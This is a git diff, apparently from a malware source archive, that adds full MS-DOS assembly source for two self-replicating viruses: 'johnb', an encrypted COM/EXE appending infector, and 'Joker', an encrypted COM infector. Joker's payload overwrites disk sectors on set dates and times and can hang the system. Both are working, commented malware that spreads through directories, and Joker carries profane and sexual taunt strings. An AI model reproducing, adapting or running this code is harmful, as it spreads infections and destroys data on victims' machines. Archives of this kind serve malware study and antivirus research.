08H ;day for the action +action_mes Db 04H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.johnb.asm b/MSDOS/Virus.MSDOS.Unknown.johnb.asm new file mode 100644 index 00000000..282fbde0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.johnb.asm @@ -0,0 +1,484 @@ +;****************************************************************** +;* * +;* My First Virus, a simple non-overwriting COM and EXE * +;* infector. * +;* by, Joshua * +;* * +;****************************************************************** + +ID = 'SS' ; My ID + + .model tiny ; Memory model + .code ; Start Code + org 100h ; Start of COM file + +MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS + +START proc near + +DECRYPT: mov bx,offset START_VIRUS ; Find out our offset + mov cx,(END_VIRUS-START_VIRUS)/2 +DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx +KEY dw 0 ; Crypt KEY + add bx,2 ; Increment offset + dec cx ; Decrement counter + jnz DECRYPT_LOOP ; Continue until done + +START_VIRUS: + call FIND_OFFSET ; Real start of virus + +; Calculate change in offset from host program. + +FIND_OFFSET: pop bp ; BP holds current IP + sub bp, offset FIND_OFFSET ; Calculate net change + ; Change BP to start of + ; virus code + +; Capture INT 24h Critical error handler. + + push es ; Save ES + mov ax,3524h ; DOS get interupt vector + int 21h ; Call DOS to do it + mov word ptr [bp+OLDINT24],bx ; Save old INT 24h + mov word ptr [bp+OLDINT24+2],es ; vector + mov ah,25h ; DOS set interupt vector + lea dx,[bp+NEWINT24] ; Address of new interupt + int 21h ; Call DOS to do it + pop es ; Restore ES + +; Find out what kind of program I am, COM or EXE, by checking stack pointer. +; This is where I store my ID in an EXE infection. + + cmp sp,ID ; COM or EXE? + je RESTORE_EXE ; I am an EXE file + +; Restore original bytes to the COM program. + +RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes + mov di,100h ; to 100h, start of file + push di ; Jmp to 100h when done + movsw ; Copy 3 bytes + movsb + jmp short RESTORE_DONE + +; Restore original bytes to the EXE program. + +RESTORE_EXE: push ds ; Save original DS + push es ; Save original ES + push cs ; Set DS = CS + pop ds + push cs ; Set ES = CS + pop es + lea si,[bp+JMPSAVE] ; Copy original CS:IP and + lea di,[bp+JMPSAVE2] ; SS:SP for return + movsw ; Copy 8 bytes + movsw + movsw + movsw + +; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy +; original command line parameters. + +RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area + mov ah,1ah ; DOS set DTA + int 21h ; Call DOS to do it + +; Save original directory. + + mov ah,47h ; DOS get current directory + lea si,[bp+ORIG_DIR] ; Store it here + mov dl,0 ; Current drive + int 21h ; Call DOS to do it + +; Search for a file to infect. + +SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file + call FINDFIRST ; Begin search + lea dx,[bp+COM_MASK] ; Search for any COM file + call FINDFIRST ; Begin search + + mov ah,3bh ; DOS change directory + lea dx,[bp+DOTDOT] ; Go up one direcotry + int 21h ; Call DOS to do it + jnc SEARCH ; Go look for more files + +; Restore default DTA, original directory, and pass control back to +; original program. + +QUIT: mov ah,3bh ; DOS change directory + lea dx,[bp+ORIG_DIR-1] ; Point to original directory + int 21h ; Call DOS to do it + push ds ; Save DS + mov ax,2524h ; DOS set interupt vector + lds dx,[bp+OLDINT24] ; Restore INT 24h + int 21h ; Call DOS to do it + pop ds ; Restore DS + mov ah,1ah ; DOS set DTA + mov dx,80h ; Restore original DTA + cmp sp,ID-4 ; EXE or COM? ES,DS on stack + jz QUIT_EXE ; Pass control to host EXE + +QUIT_COM: int 21h ; Call DOS to set DTA + retn ; Remember, 100h was on stack + +QUIT_EXE: pop es ; Restore original ES + pop ds ; Restore original DS + int 21h ; Call DOS to set DTA + mov ax,es ; AX = begin of PSP segment + add ax,16 ; Add size of PSP to get CS + add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP + add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS + cli ; Clear interrupts + mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP + mov ss,ax ; Restore SS + sti ; Set interrupts + db 0eah ; Jump SSSS:OOOO + +JMPSAVE2 dd ? ; CS:IP for EXE return +STACKSAVE2 dd ? ; SS:SP for EXE return +JMPSAVE dd ? ; Original EXE CS:IP +STACKSAVE dd ? ; Original EXE SS:SP + +CREATOR db '[Joshua]' ; That's me! + +; DOS Findfirst / Findnext services + +FINDFIRST: mov ah,4eh ; DOS find first service + mov cx,7 ; Choose files w/ any attribute +FINDNEXT: int 21h ; Call DOS to do it + jc END_SEARCH ; Quit if there are errors + ; or no more files + +; Ok, if I am here, then I found a possible victim. First open the file +; for read only. + + mov al,0 ; DOS Open file, read only + call OPEN ; Open the file + +; Read in the beginning bytes to check for previous infection and then close. + + mov ah,3fh ; DOS Read file + lea dx,[bp+BUFFER] ; Save the original header + mov cx,24 ; Read 24 bytes + int 21h ; Call DOS to do it + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Check if the file is an EXE. + +CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE? + jne CHECK_COM ; Nope, see if it's a COM + cmp word ptr [bp+BUFFER+16],ID; Is it already infected? + je ANOTHER ; Yep, so try another + jmp short INFECT_EXE ; We got one! Go infect it! + + +; Check if the file is COMMAND.COM + +CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM + jz ANOTHER ; If it is, try another file + +; Now, check for previous infection by checking for our presence at +; the end of the file. + + mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX + cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big + jle ANOTHER ; If so, try another + mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX + add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset + cmp ax,cx ; Compare file size's + jnz INFECT_COM ; If healthy, go infect it + +ANOTHER: mov ah,4fh ; Otherwise find another + jmp short FINDNEXT ; possible victim + +END_SEARCH: retn ; No files found + +;*** Subroutine INFECT_COM *** + +INFECT_COM: + +; Save the first three bytes of the COM file + + lea si,[bp+BUFFER] ; Start of first 3 bytes + lea di,[bp+COM_START] ; Store them here + movsw ; Transfer the 3 bytes + movsb + +; Calculate jump offset for header of victim so it will run virus first. +; AX has the filesize. Store new JMP and OFFSET in the buffer. + + mov cx,3 ; No. bytes to write in header + sub ax,cx ; Filesize - jmp_offset + mov byte ptr [si-3],0e9h ; Store new JMP command + mov word ptr [si-2],ax ; plus offset + add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET + push ax ; Save it for later + jmp DONE_INFECTION ; We're done! + +;*** Subroutine INFECT_EXE *** + +INFECT_EXE: + +; Save original CS:IP and SS:SP. + + les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP + mov word ptr [bp+JMPSAVE],ax ; Store IP + mov word ptr [bp+JMPSAVE+2],es ; Store CS + les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP + mov word ptr [bp+STACKSAVE],es ; Store SP + mov word ptr [bp+STACKSAVE+2],ax ; Store SS + +; Get get the header size in bytes. + + mov ax,word ptr [bp+BUFFER+8] ; Get header size + mov cl,4 ; Convert paragraphs to bytes + shl ax,cl ; Multiply by 16 + xchg ax,bx ; Put header size in BX + +; Get file size. + + les ax,[bp+offset DTA+26] ; Get filesize to + mov dx,es ; DX:AX format + + push ax ; Save filesize + push dx + + sub ax,bx ; Subtract header size + sbb dx,0 ; from filesize + + mov cx,16 ; Convert to SEGMENT:OFFSET + div cx ; form + +; Store new entry point (CS:IP) in header. + + mov word ptr [bp+BUFFER+20],dx; Store IP + mov word ptr [bp+BUFFER+22],ax; Store CS + + add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset + mov bx,dx ; Hold it for now + +; Store new stack frame (SS:SP) in header. + + mov word ptr [bp+BUFFER+14],ax; Store SS + mov word ptr [bp+BUFFER+16],ID; Store SP + + pop dx ; Get back filesize + pop ax + + add ax,END_VIRUS-START_VIRUS ; Add virus size + adc dx,0 ; to filesize + + push ax ; Save AX + mov cl,9 ; Divide AX + shr ax,cl ; by 512 + ror dx,cl + stc ; Set carry flag + adc dx,ax ; Add with carry + pop ax ; Get back AX + and ah,1 ; Mod 512 + +; Store new filesize in header. + + mov word ptr [bp+BUFFER+4],dx ; Store new filesize + mov word ptr [bp+BUFFER+2],ax + + push cs ; Restore ES + pop es + mov cx,24 ; No. bytes to write in header + + push bx ; Save START_VIRUS offset + +; Write virus to victim and restore the file's original timestamp, datestamp, +; and attributes. These values were stored in the DTA by the +; Findfirst / Findnext services. + +DONE_INFECTION: + push cx ; Save no. bytes to write + xor cx,cx ; Clear attributes + call SET_ATTR ; Set attributes + + mov al,2 ; DOS open file for read/write + call OPEN ; Open the file + +; Write the new header at the beginning of the file. + + mov ah,40h ; DOS write to file + pop cx ; Number of bytes to write + lea dx,[bp+BUFFER] ; Point to the bytes to write + int 21h ; Call DOS to do it + +; Move to end of file. + + mov ax,4202h ; DOS set read/write pointer + xor cx,cx ; Set offset move to zero + cwd ; Equivalent to xor dx,dx + int 21h ; Call DOS to do it + +; Append virus to end of file. + + mov ah,2ch ; DOS get time + int 21h ; Call DOS to do it + mov [bp+KEY],dx ; Save sec + 1/100 sec + ; as the new KEY + + lea di,[bp+APPEND] ; to the heap + mov cx,START_VIRUS-DECRYPT ; Number of bytes to move + mov al,53h ; Push BX and store it + stosb ; in the append routine + lea si,[bp+DECRYPT] ; Move Crypt routines + push si ; Save SI + push cx ; Save CX + rep movsb ; Transfer the data + + lea si,[bp+WRITE_START] ; Now copy the write + mov cx,WRITE_END-WRITE_START ; routine to the heap + rep movsb ; Transfer the data + + pop cx ; Get back + pop si ; CX and SI + rep movsb ; Recopy Crypt routine + + mov ax,0c35bh ; Tack a POP BX and + stosw ; RETN on the end + + pop ax ; New START_VIRUS offset + mov word ptr [bp+DECRYPT+1],ax; Store new offset + + call APPEND ; Write the file + +; Restore original creation date and time. + + mov ax,5701h ; DOS set file date & time + mov cx,word ptr [bp+DTA+22] ; Set time + mov dx,word ptr [bp+DTA+24] ; Set date + int 21h ; Call DOS to do it + +; Close the file. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Restore original file attributes. + + mov cx,word ptr [bp+DTA+21] ; Get original file attribute + call SET_ATTR ; Set attribute + + pop bx ; Take CALL off stack + + +; ****** B O M B S E C T I O N ****** + +; Check to see if the virus is ready to activate. +; Put all activation tests and bombs here. + +CONDITIONS: ; mov ah,2ah ; DOS get date + ; int 21h ; Call DOS to do it + ; cmp dx,1001h ; Check for Oct 1st + ; jl BOMB_DONE ; Not time yet + ; mov ah,2ch ; DOS get time + ; int 21h ; Call DOS to do it + ; cmp cl,25h ; Check for 25 min past + ; jl BOMB_DONE ; Not time yet + +BOMB: mov ah,3h ; BIOS find cursor position + mov bh,0 ; Video page 0 + int 10h ; Call BIOS to do it + push dx ; Save original Row and Column + mov cx,6 ; Number of lines to print + lea si,[bp+VERSE] ; Location of VERSE + mov dx,080ah ; Row and Column of output +PRINTLOOP: mov ah,2h ; BIOS set cursor + int 10h ; Set cursor + push dx ; Save Row and Column + mov ah,9h ; DOS print string + mov dx,si ; Location of VERSE + int 21h ; Call DOS to print it + pop dx ; Get Row and Column + inc dh ; Increment Row + add si,54 ; Go to next line of VERSE + loop PRINTLOOP ; Print all lines + + mov ah,00h ; Read character from keybd + int 16h + + pop dx ; Get original Row Column + mov ah,2h ; BIOS set cursor + int 10h ; Call BIOS to do it + +BOMB_DONE: jmp QUIT ; Go back to host program + +VERSE: db 'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·$' + db 'º Guess what ??? º$' + db 'º You have been victimized by a virus!!! Do not º$' + db 'º try to reboot your computer or even turn it º$' + db 'º off. You might as well read this and weep! º$' + db 'ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ',7,7,'$' + +; Write routine to append the virus to the end of the file. + +WRITE_START: + pop bx ; Get back file handle + push bx ; Save it again + mov ah,40h ; DOS write to file + mov cx,END_VIRUS-DECRYPT ; Length of virus + lea dx,[bp+DECRYPT] ; Start from beginning of virus + int 21h ; Call DOS to do it +WRITE_END: + + +; New INT 24h handler. + +NEWINT24: mov al,3 ; Fail call + iret ; Return + + +;*** Subroutine OPEN *** +; Open a file. Takes AL as parameter. + +OPEN proc near + mov ah,3dh ; DOS open file, read/write + lea dx,[bp+DTA+30] ; Point to filename we found + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + retn ; Return +OPEN endp + +;*** Subroutine SET_ATTR *** +; Takes CX as a parameter + +SET_ATTR proc near + mov ax,4301h ; DOS change file attr + lea dx,[bp+DTA+30] ; Point to file name + int 21h ; Call DOS + retn ; Return +SET_ATTR endp + + +; This area will hold all variables to be encrypted + +COM_MASK db '*.com',0 ; COM file mask +EXE_MASK db '*.exe',0 ; EXE file mask +DOTDOT db '..',0 ; Go up one directory +COM_START db 0cdh,20h,0 ; Header for infected file +BACKSLASH db '\' ; Backslash for directory + +START endp + +END_VIRUS equ $ ; Mark end of virus code + +; This data area is a scratch area and is not included in virus code. + +ORIG_DIR db 64 dup(?) ; Holds original directory + +OLDINT24 dd ? ; Storage for old INT 24 vector + +BUFFER db 24 dup(?) ; Read buffer and EXE header + +DTA db 43 dup(?) ; New DTA location + +APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?) + +ENDHEAP: + + end MAIN diff --git a/MSDOS/Virus.MSDOS.Unknown.joker.asm b/MSDOS/Virus.MSDOS.Unknown.joker.asm new file mode 100644 index 00000000..54bb6b05 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.joker.asm @@ -0,0 +1,541 @@ + title " Joker! virus. Written by The BOOT SECTOR Infector ... " +; +; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original +; had multiple programming errors in it that kept it from replicating. +; My version is much more successful. +; + + + page 255,80 +code segment word public 'code' + assume cs:code,ds:code + org 100h +main proc;edure + + +;EQUates... + idc equ 69h ;ID character - (note: 69) + cr equ 13 ;ASCII for carriage return + lf equ 10 ;ASCII for line feed + +;End codes. These determine what happens after the string is displayed. + + terminate equ 0 ;Terminate program after display + halt equ 1 ;Cause the system to hang after display + SimulateCritErr equ 2 ;Simulate the critical error handler + return2host equ 3 ;Resume program immediately + FlashFloppy equ 4 ;Wait for a key, then reset Drive A: + WaitKey equ 5 ;Wait for a key, then resume program + PauseKey equ 6 ;Same thing, but uses a pause message + StackError equ 7 ;Cause a stack overflow (halts system) + + + +tof: ;Top-Of-File + jmp begin ;Skip over program +idchar: db idc ;ID character + +HostProgram: nop ;First run copy only! + nop ;First run copy only! + +first_four: nop ;First run copy only! +address: int 20h ;First run copy only! +check: nop ;First run copy only! + +begin: call nextline ;Push IP+3 onto stack +nextline: pop bp ;mov bp,ip + sub bp,offset nextline ;bp=disp. for mem locs + + push ax ;Save AX + call cryptor ;Decrypt + jmp short retloc ;Continue program + +cryptor: mov al,[bp+offset encrypt_val] ;encrypt val + lea si,[bp+offset toec] ;Top Of Encrypted Code + mov cx,offset eoec-offset toec ;Length of " " +cryptorloop: xor [si],al ;en/de crypt + rol al,cl ;change code # + inc si ;Next char please! + loop cryptorloop ;loop if necessary + ret ;Return to caller + +infect: call cryptor ;Encrypt code + pop cx ;Restore CX for INT 21 + int 21h ;Call DOS + call cryptor ;Decrypt code + ret ;Go back + +toec:;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄTop Of Encrypted Code +InfectIt: push cx ;Save CX for sub + jmp infect + +retloc: pop ax ;Restore AX + xor di,di ;DI = 0 + + cli ;Disable interrupts + mov ss,di ;Set up stack at: + mov sp,2F0h ; 0000:02F0 + sti ;Enable interrupts + + mov si,96h ;Vector for INT 24h + mov bx,ss:[si] ;BX = offset in segment + mov cx,ss:[si+2] ;CX = segment + lea dx,[bp+offset int24handler] ;CS:DX -} local handler + mov ss:[si],DX ;Save offset + mov ss:[si+2],cs ;Save segment + mov si,es:[di+2F8h] ;Check operation mode + cmp si,4643h ;'CF' if already TSRed + jne GoOn ;Nope, jmp + jmp return ;Yes, don't do anything + +GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP + mov cs:[di+4Eh],cx ; to save BX and CX + push cs ;Copy CS ... + pop es ; ... to DS + + mov byte ptr [bp+offset infected],0 ;Reset infection count + mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less + +GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes + mov di,offset tof ;TOF never changes + cld ;Read left-to-right + movsw ;Copy the 4 bytes + movsw ;Copy the 4 bytes + + mov ah,1Ah ;Set DTA address ... + lea dx,[bp+offset DTA] ; ... to *our* DTA + int 21h ;Call DOS to set DTA + + mov ah,4Eh ;Find First ASCIIZ + lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 + lea si,[bp+offset filename] ;Point to file + push dx ;Save DX + jmp short continue ;Continue... + +return: mov ah,1ah ;Set DTA address ... + mov dx,80h ; ... to default DTA + int 21h ;Call DOS to set DTA + xor di,di ;DI= 0 + mov es,di ;ES= 0 + mov si,96h ;Vector for INT 24h + mov bx, cs:[di+4Ch] ;Restore from saved BX + mov word ptr es:[si+0], bx ;Place back into vector + mov cx, cs:[di+4Eh] ;Restore from saved CX + mov word ptr es:[si+2], cx ;Place back into vector + push cs ;Move CS ... + pop es ; ... to ES + + mov ax,[bp+offset SavedAX] ;Restore AX + xor bx,bx ;BX= 0 + mov cx,bx ;CX= 0 + mov dx,cx ;DX= 0 + mov si,dx ;SI= 0 + mov di,si ;DI= 0 + mov sp,0FFFEh ;SP= FFFEh (normal) + mov bp,100h ;BP= 100h (RETurn addr) + push bp ; Put on stack + mov bp,ax ;BP= 0 + ret ;JMP to 100h + +nextfile: or bx,bx ;Did we open the file? + jz skipclose ;No, so don't close it + mov ah,3Eh ;Close file + int 21h ;Call DOS to close it + xor bx,bx ;Set BX back to 0 +skipclose: mov ah,4Fh ;Find Next ASCIIZ + +continue: pop dx ;Restore DX + push dx ;Re-save DX + xor cx,cx ;CX= 0 + xor bx,bx + int 21h ;Find First/Next + jnc skipjmp + jmp NoneLeft ;Out of files + +skipjmp: mov ax,3D02h ;open file + mov dx,si ;point to filespec + int 21h ;Call DOS to open file + jc nextfile ;Next file if error + + mov bx,ax ;get the handle + mov ah,3Fh ;Read from file + mov cx,4 ;Read 4 bytes + lea dx,[bp+offset first_four] ;Read in the first 4 + int 21h ;Call DOS to read + + cmp byte ptr [bp+offset check],idc ;Already infected? + je nextfile ;Yep, try again ... +;NOTE: Delete the two lines above if you want it to re-infected programs. + + cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? + je nextfile ;Yep, maybe next time! + + mov ax,4202h ;LSeek to EOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + cmp ah,0F8h ;Longer than 62K? + ja nextfile ;Yep, try again... + mov [bp+offset addr],ax ;Save call location + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;Point to buffer + int 21h ;Save the first 4 bytes + + mov ah,[bp+offset encrypt_val] ;Get code number + inc ah ;add 1 + adc ah,0 ;increment if it's zero + mov [bp+offset encrypt_val],ah ;Save new code number + + mov ah,40h ;Write to file + mov cx,offset eof-offset begin ;Length of target code + lea dx,[bp+offset begin] ;Point to virus start + call InfectIt ;Exempt from encryption +ComeBackHere: mov ax,4200h ;LSeek to TOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + mov ax,[bp+offset addr] ;Retrieve location + inc ax ;Adjust location + + mov [bp+offset address],ax ;address to call + mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. + mov byte ptr [bp+offset check],idc ;EOFMARK + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;4 bytes are at [DX] + int 21h ;Write to file + + inc byte ptr [bp+offset infected] ;increment counter + dec byte ptr [bp+offset max2kill] ;decrement counter + jz TheEnd ;If 0 then End + + inc byte ptr [bp+offset encrypt_val] ;change code # + adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0 + jmp nextfile ;Next victim! + +NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected? + jae TheEnd ;The party's over! + + mov di,100h ;DI= 100h + cmp word ptr [di],20CDh ;an INT 20h? + je TheEnd ;Don't go to prev. dir. + + lea dx,[bp+offset prevdir] ;'..' + mov ah,3Bh ;Set current directory + int 21h ;CHDIR .. + jc TheEnd ;We're through! + mov ah,4Eh + jmp continue ;Start over in new dir + +TheEnd: xor di,di ;DI= 0 + mov es,di ;ES= 0 + mov ah,2ah ;Get date + int 21h ;Do it + cmp dl,4 ;4th of the month? + jne test2 ;Nope, second test + cmp dh,7 ;July? + jne test2 ;Nope, second test + xor ax,ax ;Sector 0 + jmp Kill ;Kill the disk now... + +test2: mov ah,2ch ;Get time + int 21h ;Do it + or cl,cl ;On the hour? (x:00 xM) + jnz GiveUp ;Return to program + cmp ch,6 ;Midnight to 5 AM ??? + jnl GiveUp ;Return to program + add cl,ch ;Add first number + mov ax,cx ;Transfer to AX + cbw ;Zero out AH + add al,dh ;Add DL to AL + adc al,dl ;Add DL and carry flag + adc ah,0 ;Add carry to AH + or ax,ax ;AX = 0 ??? + jnz Kill ;Kill the disk now... + inc ax ;Well, adjust first... + +Kill: mov dx,ax ;Sector number + mov cx,1 ;One at a time.... + xor bx,bx ;Point at PSP + mov ah,19h ;Get current disk + int 21h ;Call DOS to ^ + int 26h ;Now kill the disk + +GiveUp: mov bx,offset message_table ;point to table + + mov ah,2ch ;Get time + int 21h ;Call DOS to ^ + inc dh ;(0-59) + +timeloop: cmp dh,msgs ;mapped yet? + jl timedone ;Yes, jump + sub dh,msgs ;try to map it + jmp short timeloop ;and check out work + +timedone: mov al,dh ;AL gets msg # + mov cl,al ;Save in CL for CritErr + cbw ;AH gets 0 + shl ax,1 ;AX = AX * 2 + add bx,ax ;BX = index + mov si,[bx] ;SI points to string + mov ch,[si-1] ;CH is technique # + mov dx,si ;DX points to string + + mov ah,9 ;Display string + int 21h ;Call DOS to ^ + + cmp ch,terminate ;Terminate program? + je TerminateProg ;Nope, next test + + cmp ch,halt ;Halt program? + je $ ;Hang system if ch=halt + + cmp ch,SimulateCritErr ;Simulate CritErr? + je simulate ;yes, go do it + + cmp ch,Return2host ;Return to host? + je ResumeProgram ;yes, go do it + + cmp ch,FlashFloppy ;Flash drive A:? + je FlashFlop ;Yes, go do it + + cmp ch,WaitKey ;Wait for keypress? + je zwait ;Yes, go do it + + cmp ch,PauseKey ;Pause message w/ wait? + je zpause ;Yes, go do it + + cmp ch,StackError ;Stack overflow? + je StackErr ;Yes, go do it + + ;Invalid code, assume Return2host + +ResumeProgram: jmp return ;Return to caller +StackErr: call $ ;Cause stack overflow +TerminateProg: int 20h ;Yep, all done! + +simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + + mov ah,1 ;Input a char + int 21h ;Call DOS to ^ + + lea dx,[bp+offset crlf] ;crlf + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + + cmp al,'a' ;Uppercase? + jb uppercase ;Nope, jump + sub al,' ' ;Yes, make uppercase + +uppercase: cmp al,'A' ;Abort? + je terminateprog ;Yep, go do it. + + cmp al,'R' ;Retry? + jne zskip ;skip over "retry" code + + lea dx,[bp+offset crlf] ;Point to crlf + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + mov dh,cl ;Restore DH from CL + jmp timedone ;Reprint error + +zskip: cmp al,'I' ;Ignore? + je ResumeProgram ;Return to host program + cmp al,'F' ;Fail? + jne simulate ;Invalid response + + lea dx,[bp+offset fail24] ;Point to fail string + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + int 20h ;Terminate program + +FlashFlop: mov ah,1 ;Wait for keypress + int 21h ;Call DOS to ^ + + xor ax,ax ;Drive A: + mov cx,1 ;Read 1 sector + mov dx,ax ;Start at boot sector + lea bx,[bp+offset boot_sector] ;BX points to buffer + int 25h ;Flash light on A: + jmp short ResumeProgram ;Resume if no error + +zpause: lea dx,[bp+offset pause] ;Point to pause message + mov ah,9 ;Print string + int 21h ;Call DOS to ^ +zwait: + mov ah,1 ;Wait for keypress + int 21h ;Call DOS to ^ + jmp short ResumeProgram ;Go on... + + + + + +ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' +fail24 db cr,lf,cr,lf,'Fail on INT 24' +crlf db cr,lf,'$' + +message_table: + dw offset msg1 + dw offset msg2 + dw offset msg3 + dw offset msg4 + dw offset msg5 + dw offset msg6 + dw offset msg7 + dw offset msg8 + dw offset msg9 + dw offset msg10 + dw offset msg11 + dw offset msg12 + dw offset msg13 + dw offset msg14 + dw offset msg15 + dw offset msg16 + dw offset msg17 + dw offset msg18 + dw offset msg19 + dw offset msg20 + +msgs db 20 + +; I tried to make it as simple as possible to change the messages +; and add/delete them. Each message is in the format: +; +; db [technique] +;[label] db [Text] +; +; Where [technique] is one of the 8 codes shown at the beginning of +; this file (terminate, halt, etc.). This determines what the virus +; should do after printing the message. +; [label] is in the form "msg##" where ## is a number from 1 to +; "msgs". "msgs" is defined immediately before this +; comment block. +; [text] is a combination of text and ASCII codes, terminated by +; either a '$' or a ,36. +; +; If you change the number of messages the virus has, you should also +; add/remove lines from the offset table and change the "msgs" +; data byte appropriately. Let's say for instance that you want +; to remove "Program too big to fit in memory.": +; 1) Delete the line(s) with the message and the line +; immediately before it. +; 2) Move message #20 up to message #2's position and +; change its label from "msg20" to "msg2". +; 3) Delete the line "dw offset msg20" from the offset +; table. +; 4) Change the line before this comment block to: +; "msgs db 19" +; +; Later! +; -The BOOT SECTOR Infector ... +; + + db FlashFloppy ;Waits for key, then flashes drive A: +msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf +pause db 'Strike any key when ready... $' + + db SimulateCritErr ;Prints ARIF message and responds appropriately +msg1 db 'Impotence error reading user',39,'s dick$' + + db terminate ;Ends the program immediately +msg2 db 'Program too big to fit in memory',cr,lf,'$' + + db halt ;Halts the system +msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$' + + db terminate ;Ends the program immediately +msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' + db ' I can',39,'t do that!',cr,lf,'$' + + db WaitKey ;Waits for a keypress, then runs the program +msg6 db 'Format another? (Y/N)? $' + + db StackError ;Generates a stack overflow (halts the system) +msg7 db 'Damn it! I told you not to touch that!$' + + db terminate ;Ends the program immediately +msg8 db 'Suck me!',cr,lf,'$' + + db SimulateCritErr ;Prints ARIF message and responds appropriately +msg9 db 'Cocksucker At Keyboard error reading device CON:$' + + db terminate ;Ends the program immediately +msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf + db 'I',39,'m sorry, but your call cannot be completed as dialed.' + db cr,lf,'Please hang up & try your call again.',cr,lf,'$' + + db terminate ;Ends the program immediately +msg11 db 'No!',cr,lf,cr,lf,'$' + + db halt ;Halts the system +msg12 db 'Panic kernal mode interrupt$' + + db WaitKey ;Waits for a keypress, then runs the program +msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$' + + db return2host ;Runs host program immediately +msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$' + + db terminate ;Ends the program immediately +msg15 db 'And if I refuse?',cr,lf,'$' + + db return2host ;Runs host program immediately +msg16 db 'Fuck the world and its followers!',cr,lf,'$' + + db return2host ;Runs host program immediately +msg17 db 'You are pathetic, man... you know that?',cr,lf,'$' + + db terminate ;Ends the program immediately +msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$' + + db terminate ;Ends the program immediately +msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$' + + db PauseKey ;Waits for keypress (SAKWR), then runs host prg +msg20 db 'Joker! ver àà by TBSI!',cr,lf + db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$' + +int24handler: xor al,al ;Ignore the error + iret ;Interrupt return + + +filespec: db '*.COM',0 ;File specification +prevdir: db '..',0 ;previous directory +max2kill db 3 ;max. files to infect + +eoec:;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEnd Of Encrypted Code +VersionNumber dw 100h ;Version 1.00 +encrypt_val db 0 ;1st-run copy only + +; None of this information is included in the virus's code. It is only used +; during the search/infect routines and it is not necessary to preserve it +; in between calls to them. + +eof: +DTA: + + db 21 dup (?) ;internal search's data +attribute db ? ;attribute +file_time db 2 dup (?) ;file's time stamp +file_date db 2 dup (?) ;file's date stamp +file_size db 4 dup (?) ;file's size +filename db 13 dup (?) ;filename + +SavedAX dw ? ;Used to save AX +infected db ? ;infection count +addr dw ? ;Address + +boot_sector: + + main endp;rocedure + code ends;egment + + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.joshua.asm b/MSDOS/Virus.MSDOS.Unknown.joshua.asm new file mode 100644 index 00000000..282fbde0 --- /dev/null +++ 